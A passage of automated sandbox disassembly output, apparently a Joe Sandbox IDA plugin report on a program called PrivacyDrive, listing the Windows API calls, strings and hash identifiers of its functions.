                                • GdipSetClipRegion.GDIPLUS(?,?,00000000,?,?,7563D392), ref: 0042D720
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 0042D744
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000000,?,00000064,00000019,?,00000064,?,FF414141,00000000,00000000,?,?,?,?,00000000), ref: 0042D7D6
                                • GdipSetStringFormatLineAlign.GDIPLUS(?,00000001), ref: 0042D7FC
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,00000008,0000001D,?,?,?,FF414141,?,00000008,00000008,?,?,FF414141), ref: 0042D8BA
                                • GdipDeleteBrush.GDIPLUS(?), ref: 0042D8D1
                                • GdipDeletePath.GDIPLUS(?), ref: 0042D8E0
                                • GdipDeleteRegion.GDIPLUS(?), ref: 0042D8F2
                                Similarity
                                • API ID: Gdip$Path$CreateDeleteFormatString$ClipRegion$AlignGradient$BrushFillFocusFromLineRectScales
                                • String ID:
                                • API String ID: 3976200767-0
                                • Opcode ID: 856bd7b8fd2f43be429881904b70c3a87543154a6d411990ca30d853c1daf611
                                • Instruction ID: 438f0d58572181c0c9f278595c685e5d405f47503ee238b1893350e076efd6a8
                                • Opcode Fuzzy Hash: 856bd7b8fd2f43be429881904b70c3a87543154a6d411990ca30d853c1daf611
                                • Instruction Fuzzy Hash: 9CC157B1608341AFE711CF24C845B5BBBE8FF99314F104A1EF9A5972A0D770E948CB56
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,00435460), ref: 004352E0
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,00435460), ref: 004352F8
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog\Button,?,SPLASH|CLOSE,?,?,?,00435460), ref: 00435325
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,00435460), ref: 00435337
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog\Button,?,SPLASH|CLOSE,?,?,?,00435460), ref: 00435364
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,00435460), ref: 00435376
                                Strings
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: Dialog\Button$IMG_HIT$IMG_NORMAL$IMG_PUSH$PM_HEIGHT$PM_RIGHT$PM_TOP$PM_WIDTH$SPLASH|CLOSE
                                • API String ID: 904232820-1171755522
                                • Opcode ID: a3294f2705f154f8f036b536cae1ebb6c065207f2ae3daecc49b24937574667b
                                • Instruction ID: f7248e3511a0334548e6fba1859fd11e6aa3f2101fc69f97611eb1fe6e9bcd4c
                                • Opcode Fuzzy Hash: a3294f2705f154f8f036b536cae1ebb6c065207f2ae3daecc49b24937574667b
                                • Instruction Fuzzy Hash: CB31A270380701A7D614A7729D42FEB6A94BB24B05F44402BB74A972D1FFE8F940DA65
                                APIs
                                • GdipCreatePath.GDIPLUS(00000000,7563D392,7563D392,?,00000000,7563D392,005429F8,000000FF,?,00457F77,00000000,00000000,?), ref: 0045811A
                                • GdipResetPath.GDIPLUS(00000000,?,00000000), ref: 0045819B
                                • #1.GDIPLUS(00000000), ref: 004581CA
                                • GdipGetPathLastPoint.GDIPLUS(00000000,?), ref: 004581E8
                                • GdipResetPath.GDIPLUS(00000000), ref: 00458216
                                • #1.GDIPLUS(00000000), ref: 00458248
                                • GdipGetPathLastPoint.GDIPLUS(00000000,?), ref: 00458260
                                • GdipResetPath.GDIPLUS(00000000), ref: 0045828E
                                • #1.GDIPLUS(00000000), ref: 004582C2
                                • GdipGetPathLastPoint.GDIPLUS(00000000,00000000), ref: 004582DA
                                • GdipResetPath.GDIPLUS(00000000), ref: 00458314
                                • #1.GDIPLUS(00000000), ref: 0045834B
                                • GdipGetPathLastPoint.GDIPLUS(00000000,00000000), ref: 00458363
                                • GdipDeletePath.GDIPLUS(00000000), ref: 0045841F
                                Similarity
                                • API ID: GdipPath$LastPointReset$CreateDelete
                                • String ID:
                                • API String ID: 2820090972-0
                                • Opcode ID: 2f990baf44bd20d73e386656a5ba6041f534ae142c86b67bb0f298a9baee9ea4
                                • Instruction ID: 4a4483b2e7dc2c645fc89ccffc9d9223d29021c5c56857fdb135a8fbe4f2e15f
                                • Opcode Fuzzy Hash: 2f990baf44bd20d73e386656a5ba6041f534ae142c86b67bb0f298a9baee9ea4
                                • Instruction Fuzzy Hash: 7BB1E731E04709DFDB02CFBAC9506AEFBB4BF59341F149719E801B22A0E73169949F90
                                APIs
                                  • Part of subcall function 004A5820: wsprintfW.USER32 ref: 004A584E
                                  • Part of subcall function 004A5820: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 004A586D
                                • CloseHandle.KERNEL32(?,7563D392), ref: 0040375D
                                  • Part of subcall function 00477320: DeviceIoControl.KERNEL32(?,07770C2C,00000000,00000000,00000000,00000004,?,00000000), ref: 0047734C
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 00403536
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 00403565
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 00403653
                                • GetLastError.KERNEL32(?,00000001,00000001,?,?,7563D392), ref: 00403674
                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000,?,00000001,00000001,?,?,7563D392), ref: 00403693
                                • LocalFree.KERNEL32(00000000,00000001,?,?,7563D392), ref: 004036BE
                                  • Part of subcall function 004A6480: SetLastError.KERNEL32(00000000), ref: 004A666F
                                Strings
                                Similarity
                                • API ID: Message$Peek$ErrorLast$CloseControlCreateDeviceFileFormatFreeHandleLocalwsprintf
                                • String ID: !@$%c:$0016$0022$0029
                                • API String ID: 2704691174-1726813969
                                • Opcode ID: 5f24f6ef5e7d46d9e4a494608de4282668a4d28811a082688af7ac02d9fbadf6
                                • Instruction ID: 31412f3bf7a1ac3e694d361a8f39e4ee48b85b686707f11fe369b3550fe6f3a5
                                • Opcode Fuzzy Hash: 5f24f6ef5e7d46d9e4a494608de4282668a4d28811a082688af7ac02d9fbadf6
                                • Instruction Fuzzy Hash: 6181D670E00308AAEB10DFA4CC46BEEBEB8BF05719F14412AF504B73D1D7B95A048B69
                                APIs
                                Strings
                                Similarity
                                • API ID: _memset$_memmove
                                • String ID: 8GW$PublicKey$SerialNumber.cpp$Version2.xml$_1K
                                • API String ID: 2532777613-2887264915
                                • Opcode ID: de0c5c0a06387669f1bb31e05598b7a9625e796630f1576bdac0d428fb526df5
                                • Instruction ID: ca0cafd54b3c3db3e4d1dbc2cdb5afc0daf6f304b2cc11b1bffecd5b0a2cdfbe
                                • Opcode Fuzzy Hash: de0c5c0a06387669f1bb31e05598b7a9625e796630f1576bdac0d428fb526df5
                                • Instruction Fuzzy Hash: C74172B590021AABDB10EF90DC86FEFBBBCFB49714F144129F90477281E7755A048AA5
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 004147C0
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004147D8
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,PASSWORD), ref: 00414805
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00414817
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,PASSWORD), ref: 00414844
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00414856
                                Strings
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: Dialog$PASSWORD$PM_CHECK_SHOW_PASSWORD_X$PM_CHECK_SHOW_PASSWORD_Y$PM_EDIT_PASSWORD_X$PM_EDIT_PASSWORD_Y$PM_ICON_X$PM_ICON_Y
                                • API String ID: 904232820-2624524072
                                • Opcode ID: e8db55d7b1908a0fa7b2e1c0d2b0fa62b8fba69d15af4ddc4ae9a52a096395ea
                                • Instruction ID: 0749ce777d0c1f011bc5d9ffd6b66f9ba536939ed2dc269ecbaf3dadcd922a93
                                • Opcode Fuzzy Hash: e8db55d7b1908a0fa7b2e1c0d2b0fa62b8fba69d15af4ddc4ae9a52a096395ea
                                • Instruction Fuzzy Hash: E231867039070666DA54BB728D22FB75A9D7B44F06F04412BB644D72C1EFE8E811C7E8
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,004285EC,?,?,?,004260BD,?,00000000,?,?), ref: 004284A0
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,004260BD,?,00000000,?,?), ref: 004284B8
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Button,?,ATTRIB_INFO_EXPAND,?,?,004260BD,?,00000000,?,?), ref: 004284E5
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,004260BD,?,00000000,?,?), ref: 004284F7
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Button,?,ATTRIB_INFO_EXPAND,?,?,004260BD,?,00000000,?,?), ref: 00428524
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,004260BD,?,00000000,?,?), ref: 00428536
                                Strings
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: ATTRIB_INFO_EXPAND$Button$IMG_HIT_DOWN$IMG_HIT_UP$IMG_NORMAL_DOWN$IMG_NORMAL_UP$IMG_PUSH_DOWN$IMG_PUSH_UP
                                • API String ID: 904232820-555796725
                                • Opcode ID: 11c9a47e5b92698b2e0b2151c23fcaf5e2db74ea38875ed784e1f084f3d97d25
                                • Instruction ID: b6b36f9a8226f80d28ac43113e655ba857088e9019b2d533f81fd12321fe5249
                                • Opcode Fuzzy Hash: 11c9a47e5b92698b2e0b2151c23fcaf5e2db74ea38875ed784e1f084f3d97d25
                                • Instruction Fuzzy Hash: 4A31A5703C031677D62467729C42FAB6A987F50B55F08002FBB4AD62C1FED8F940D668
                                APIs
                                • GdipGraphicsClear.GDIPLUS(?,00000000,7563D392), ref: 004A1098
                                • GdipSetSmoothingMode.GDIPLUS(?,00000002), ref: 004A10B0
                                • GdipCreateRegion.GDIPLUS(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0053E8F0,000000FF), ref: 004A10CA
                                • GdipGetClip.GDIPLUS(?,00000000), ref: 004A10EE
                                • GdipCreatePath.GDIPLUS(00000000,00000000), ref: 004A1133
                                • GdipSetClipPath.GDIPLUS(?,?,00000004), ref: 004A1172
                                • GdipSetClipRegion.GDIPLUS(?,00000000,00000000), ref: 004A11B3
                                • GdipSetSmoothingMode.GDIPLUS(?,00000003), ref: 004A11D5
                                • GdipTranslateWorldTransform.GDIPLUS(?), ref: 004A1213
                                • GdipTranslateWorldTransform.GDIPLUS(?), ref: 004A1266
                                • GdipSetClipRegion.GDIPLUS(?,00000000,00000000), ref: 004A127B
                                • GdipDeletePath.GDIPLUS(?), ref: 004A1291
                                • GdipDeleteRegion.GDIPLUS(00000000), ref: 004A12A0
                                Similarity
                                • API ID: Gdip$ClipRegion$Path$CreateDeleteModeSmoothingTransformTranslateWorld$ClearGraphics
                                • String ID:
                                • API String ID: 3845705052-0
                                APIs
                                • GdipCreatePen1.GDIPLUS(00000000,00000000,00547488,7563D392,?,00000000), ref: 00486C1A
                                • GdipCreatePen1.GDIPLUS(?,00000000,?,?,00000000), ref: 00486C41
                                • GdipCreateTexture.GDIPLUS(?,00000000,7563D392,?,00000000,?,?,00000000), ref: 00486CC4
                                • GdipCreateSolidFill.GDIPLUS(?,00000000,?,00000000,?,?,00000000), ref: 00486D07
                                • GdipCreateSolidFill.GDIPLUS(00000000,?,00000000,?,?,00000000), ref: 00486D40
                                • GdipDeleteBrush.GDIPLUS(?,?,00000000,?,?,00000000), ref: 00486DCD
                                • GdipDeleteBrush.GDIPLUS(?,?,00000000,?,?,00000000), ref: 00486DDD
                                • GdipDeleteBrush.GDIPLUS(?,?,00000000,?,?,00000000), ref: 00486DED
                                • GdipDeletePen.GDIPLUS(00000000,?,00000000,?,?,00000000), ref: 00486DFC
                                • GdipDeletePen.GDIPLUS(00000000,?,00000000,?,?,00000000), ref: 00486E08
                                Strings
                                Similarity
                                • API ID: Gdip$CreateDelete$Brush$FillPen1Solid$Texture
                                • String ID: xV
                                • API String ID: 2474244928-2633863268
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,00000000,75A90460,75A90500), ref: 0041D6A4
                                • OpenServiceW.ADVAPI32(00000000,PDService,000F01FF), ref: 0041D6BB
                                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 0041D6D0
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0041D6E2
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0041D6E5
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 0041D709
                                • OpenServiceW.ADVAPI32(00000000,?,000F01FF), ref: 0041D71D
                                • DeleteService.ADVAPI32(00000000), ref: 0041D72A
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0041D731
                                • CloseServiceHandle.ADVAPI32(?), ref: 0041D736
                                Strings
                                Similarity
                                • API ID: Service$CloseHandleOpen$Manager$DeleteQueryStatus
                                • String ID: PDService
                                • API String ID: 4103454408-2327897599
                                APIs
                                • GetDC.USER32(00000000), ref: 0042E55A
                                • GdipCreateFromHDC.GDIPLUS(00000000,?), ref: 0042E57A
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000), ref: 0042E5FD
                                • GdipMeasureString.GDIPLUS(00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?), ref: 0042E63E
                                • SystemParametersInfoW.USER32(00000030,00000000,0053DFC0,00000000), ref: 0042E68F
                                • GdipSetTextRenderingHint.GDIPLUS(00000000,00000005), ref: 0042E6BC
                                • GdipSetStringFormatTrimming.GDIPLUS(00000000,00000002), ref: 0042E6CF
                                • GdipMeasureString.GDIPLUS(00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?), ref: 0042E71B
                                • GdipMeasureString.GDIPLUS(00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?), ref: 0042E7C3
                                • ReleaseDC.USER32(00000000,?), ref: 0042E846
                                • GdipDeleteStringFormat.GDIPLUS(00000000), ref: 0042E853
                                • GdipDeleteGraphics.GDIPLUS(00000000), ref: 0042E861
                                Similarity
                                • API ID: Gdip$String$FormatMeasure$CreateDelete$FromGraphicsHintInfoParametersReleaseRenderingSystemTextTrimming
                                • String ID:
                                • API String ID: 3909781840-0
                                APIs
                                • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004309FB
                                • EnterCriticalSection.KERNEL32(?), ref: 00430A74
                                • LeaveCriticalSection.KERNEL32(?), ref: 00430ACC
                                • KillTimer.USER32(00000000), ref: 00430AEB
                                • IsWindowVisible.USER32(00000000), ref: 00430B73
                                • KillTimer.USER32(00000000), ref: 00430B8A
                                  • Part of subcall function 00430E20: __CxxThrowException@8.LIBCMT ref: 00430E94
                                  • Part of subcall function 00430E20: SetWindowPos.USER32(00000000,?,00577AF8), ref: 00430F0A
                                • PostThreadMessageW.USER32(?,00000466,00000000,00000000), ref: 00430BAB
                                • KillTimer.USER32(00000000), ref: 00430BCA
                                • SetTimer.USER32(00000000), ref: 00430BE4
                                • TranslateMessage.USER32(?), ref: 00430C7C
                                • DispatchMessageW.USER32(?), ref: 00430C87
                                • PostQuitMessage.USER32(00000000), ref: 00430CE7
                                Similarity
                                • API ID: Message$Timer$Kill$CriticalPostSectionWindow$DispatchEnterException@8LeaveQuitThreadThrowTranslateVisible
                                • String ID:
                                • API String ID: 2598821415-0
                                APIs
                                • GetWindowRect.USER32(00000000), ref: 004185B4
                                  • Part of subcall function 004CB410: GdipSetSmoothingMode.GDIPLUS(?,00000003,?,lB,0056CE40,?,?,?,?,0042E96C,?,?), ref: 004CB477
                                • __CxxThrowException@8.LIBCMT ref: 00418608
                                  • Part of subcall function 00502BEB: RaiseException.KERNEL32(?,?,7563D392,005A7F20,?,?,?,?,?,004FFD4E,7563D392,005A7F20,?,00000001), ref: 00502C40
                                • QueryPerformanceFrequency.KERNEL32(?,?,?), ref: 0041861B
                                • QueryPerformanceCounter.KERNEL32(?), ref: 00418649
                                • QueryPerformanceCounter.KERNEL32(?), ref: 0041864F
                                • PeekMessageW.USER32(00000002,00000000,00000000,00000000,00000002), ref: 004186A6
                                • GetDC.USER32(00000000), ref: 00418738
                                • UpdateLayeredWindow.USER32(?,00000000,?,?,?,00000000,00000000,00000000,00000002), ref: 00418761
                                • ReleaseDC.USER32(00000000,00000000), ref: 0041876A
                                • Sleep.KERNEL32(0000000A), ref: 00418772
                                • QueryPerformanceCounter.KERNEL32(?), ref: 0041877C
                                • PeekMessageW.USER32(00000002,00000000,00000000,00000000,00000002), ref: 004187C5
                                Similarity
                                • API ID: PerformanceQuery$Counter$MessagePeekWindow$ExceptionException@8FrequencyGdipLayeredModeRaiseRectReleaseSleepSmoothingThrowUpdate
                                • String ID:
                                • API String ID: 1948315272-0
                                APIs
                                  • Part of subcall function 004D44A0: VirtualAlloc.KERNEL32(00000000,00000014,00001000,00000040,?,004A0394,7563D392), ref: 004D44B4
                                  • Part of subcall function 004D44A0: GetCurrentProcess.KERNEL32(?,00000014), ref: 004D4512
                                  • Part of subcall function 004D44A0: FlushInstructionCache.KERNEL32(00000000), ref: 004D4519
                                  • Part of subcall function 0049FFD0: EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,004A03AE), ref: 0049FFE0
                                  • Part of subcall function 0049FFD0: LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,004A03AE), ref: 0049FFF8
                                  • Part of subcall function 0049FFD0: EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,BASE_DIALOG,?,?,?,004A03AE), ref: 004A0025
                                  • Part of subcall function 0049FFD0: LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,004A03AE), ref: 004A0037
                                  • Part of subcall function 0049FFD0: EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,BASE_DIALOG,?,?,?,004A03AE), ref: 004A0064
                                  • Part of subcall function 0049FFD0: LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,004A03AE), ref: 004A0076
                                • GetDesktopWindow.USER32 ref: 004A0440
                                • IsWindowEnabled.USER32(?), ref: 004A044B
                                • SendMessageW.USER32(?,0000000A,00000000,00000000), ref: 004A045C
                                • EnableWindow.USER32(?,00000000), ref: 004A0465
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004A047E
                                • GetSystemMetrics.USER32(00000000), ref: 004A048C
                                • GetSystemMetrics.USER32(00000001), ref: 004A049C
                                • SetWindowPos.USER32(00000000), ref: 004A0573
                                • SendMessageW.USER32(?,0000000A,00000001,00000000), ref: 004A0587
                                • EnableWindow.USER32(?,00000001), ref: 004A0590
                                • IsWindowVisible.USER32(?), ref: 004A0597
                                • SetFocus.USER32(?), ref: 004A05A2
                                Similarity
                                • API ID: CriticalSectionWindow$EnterLeaveSystem$EnableMessageMetricsSend$AllocCacheCurrentDesktopEnabledFlushFocusInfoInstructionParametersProcessVirtualVisible
                                • String ID:
                                • API String ID: 1894409159-0
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 0042D290
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0042D2A8
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,TIP), ref: 0042D2D5
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0042D2E7
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,TIP), ref: 0042D314
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0042D326
                                Strings
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: CR_BACKGROUND_BEGIN$CR_BACKGROUND_END$CR_BORDER_HIGH$CR_BORDER_LOW$Dialog$TIP
                                • API String ID: 904232820-1338357848
                                APIs
                                • RegOpenKeyW.ADVAPI32(80000000,?,75A8EB20), ref: 004C4BD5
                                • RegQueryValueExW.ADVAPI32(00000000,0056C344,00000000,00000000,00000000,00000001,?,00000001,00000000,00000000,0056C40C,?,00000001,7563D392,00000001), ref: 004C4C42
                                  • Part of subcall function 004FFB7D: std::exception::exception.LIBCMT ref: 004FFB90
                                  • Part of subcall function 004FFB7D: __CxxThrowException@8.LIBCMT ref: 004FFBA5
                                • RegQueryValueExW.ADVAPI32(00000000,0056C344,00000000,00000000,00000000,?), ref: 004C4C7D
                                • RegCloseKey.ADVAPI32(00000000,?,00000001,00000000,00000000,0056C40C,?,00000001,7563D392,00000001), ref: 004C4CAE
                                • SHChangeNotify.SHELL32(08000000,00001000,00000000,00000000), ref: 004C4EC1
                                Strings
                                Similarity
                                • API ID: QueryValue$ChangeCloseException@8NotifyOpenThrowstd::exception::exception
                                • String ID: !@$Privacy Drive$Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\$Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\$invalid string position
                                • API String ID: 1895082097-1561404141
                                APIs
                                • GetDC.USER32(00000000), ref: 004A354E
                                • GdipCreateFromHDC.GDIPLUS(00000000,000000FF), ref: 004A356B
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 004A35C4
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004A35DB
                                • GdipSetTextRenderingHint.GDIPLUS(005496D0,00000005), ref: 004A3617
                                • GdipSetStringFormatTrimming.GDIPLUS(00000000,00000002), ref: 004A362D
                                • GdipMeasureString.GDIPLUS(005496D0,?,000000FF,00000000,?,00000000,00000000,?,?), ref: 004A3679
                                • GdipMeasureString.GDIPLUS(005496D0,?,000000FF,00000000,?,00000000,00000000,?,?), ref: 004A3737
                                • ReleaseDC.USER32(00000000,?), ref: 004A378D
                                • GdipDeleteStringFormat.GDIPLUS(00000000), ref: 004A379A
                                • GdipDeleteGraphics.GDIPLUS(005496D0), ref: 004A37AA
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$String$Format$CreateDeleteMeasure$FromGraphicsHintInfoParametersReleaseRenderingSystemTextTrimming
                                • String ID:
                                • API String ID: 106890554-0
                                • Opcode ID: 5890bdb8e7a74715a0ee46108134513eac91f680ffebe5860ef7377ea31df84d
                                • Instruction ID: 39dda621fb170c209f9bae212b4b28789da7fc75bb3bdaa9c85f2a86434fbbe9
                                • Opcode Fuzzy Hash: 5890bdb8e7a74715a0ee46108134513eac91f680ffebe5860ef7377ea31df84d
                                • Instruction Fuzzy Hash: D8913675E00308EFDB01CFA9D994A9DBBB4FF5A701F14821AE815BB290E734A945DF50
                                APIs
                                  • Part of subcall function 004CBC00: GdipCreateSolidFill.GDIPLUS(?,FFFFFFFF), ref: 004CBC55
                                  • Part of subcall function 004CBC00: GdipFillRectangle.GDIPLUS(?,00000000), ref: 004CBCAB
                                  • Part of subcall function 004CBC00: GdipDeleteBrush.GDIPLUS(00000000), ref: 004CBCC7
                                • GdipGetImageWidth.GDIPLUS(?,00000000,?,00000000,00000000), ref: 0041B75A
                                • GdipDrawImage.GDIPLUS(?,00000000), ref: 0041B7B9
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 0041B7E1
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 0041B81E
                                • GdipGetImageWidth.GDIPLUS(?,?,?,?), ref: 0041B84E
                                • GdipDrawImage.GDIPLUS(?,00000000), ref: 0041B8BD
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 0041B8DF
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000000), ref: 0041B8F7
                                • GdipSetStringFormatLineAlign.GDIPLUS(?,00000001), ref: 0041B910
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 0041B946
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,?,?,?,FF414141,00000000,?,?,?,FF414141), ref: 0041B9B2
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$Image$Width$FormatString$AlignCreateDeleteDrawFill$BrushLineRectangleSolid
                                • String ID:
                                • API String ID: 1060473745-0
                                • Opcode ID: f6a606b4eb581658c7e629b46e165f12fea829e2425ac2cd4e2d51314c96d511
                                • Instruction ID: 5b93129b29db21c0d9eb51a47d62c76178d00eadee66308f1042f0f98f3860ef
                                • Opcode Fuzzy Hash: f6a606b4eb581658c7e629b46e165f12fea829e2425ac2cd4e2d51314c96d511
                                • Instruction Fuzzy Hash: 80911475204705AFC714CF25C884B5ABBE5FF89714F048A2DF899973A0E730E854DB91
                                APIs
                                  • Part of subcall function 004CBC00: GdipCreateSolidFill.GDIPLUS(?,FFFFFFFF), ref: 004CBC55
                                  • Part of subcall function 004CBC00: GdipFillRectangle.GDIPLUS(?,00000000), ref: 004CBCAB
                                  • Part of subcall function 004CBC00: GdipDeleteBrush.GDIPLUS(00000000), ref: 004CBCC7
                                • GdipGetImageWidth.GDIPLUS(?,00000000,?,00000000,00000000), ref: 0041BA3A
                                • GdipDrawImage.GDIPLUS(?,00000000), ref: 0041BA99
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 0041BAC1
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 0041BAFE
                                • GdipGetImageWidth.GDIPLUS(?,?,?,?), ref: 0041BB2E
                                • GdipDrawImage.GDIPLUS(?,00000000), ref: 0041BB9D
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 0041BBBF
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000000), ref: 0041BBD7
                                • GdipSetStringFormatLineAlign.GDIPLUS(?,00000001), ref: 0041BBF0
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 0041BC26
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,?,?,?,FF414141,00000000,?,?,?,FF414141), ref: 0041BC92
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
